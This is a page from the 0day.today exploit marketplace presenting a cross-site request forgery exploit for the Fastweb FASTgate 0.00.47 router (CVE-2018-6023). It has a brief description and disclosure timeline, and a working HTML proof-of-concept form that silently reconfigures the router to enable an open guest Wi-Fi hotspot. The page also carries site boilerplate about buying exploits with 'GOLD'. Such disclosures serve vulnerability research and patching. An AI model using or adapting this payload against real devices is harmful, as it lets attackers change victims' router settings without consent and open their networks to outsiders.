0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Fastweb FASTGate 0.00.47 - Cross-site Request Forgery
Author
Risk
[
Security Risk Low
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Fastweb FASTgate 0.00.47 CSRF # Exploit Authors: Raffaele Sabato # Contact: https://twitter.com/syrion89 # Vendor: Fastweb # Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/ # Version: 0.00.47 # CVE: CVE-2018-6023 I DESCRIPTION ======================================================================== An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc. The vulnerability was disclosed to Fastweb on 19 January 2018. Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018. II PROOF OF CONCEPT ======================================================================== ## Activate Gues Wi-Fi: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.254/status.cgi"> <input type="hidden" name="_" value="1516312144136" /> <input type="hidden" name="act" value="nvset" /> <input type="hidden" name="hotspot_broadcast_ssid" value="1" /> <input type="hidden" name="hotspot_enable" value="1" /> <input type="hidden" name="hotspot_filtering" value="all" /> <input type="hidden" name="hotspot_security" value="WPA2PSK" /> <input type="hidden" name="hotspot_ssid" value="GUEST-Test" /> <input type="hidden" name="hotspot_timeout" value="-1" /> <input type="hidden" name="service" value="wl_guestaccess" /> <input type="submit" value="Submit request" /> </form> </body> </html> III REFERENCES ======================================================================== http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/ # 0day.today [2024-11-15] #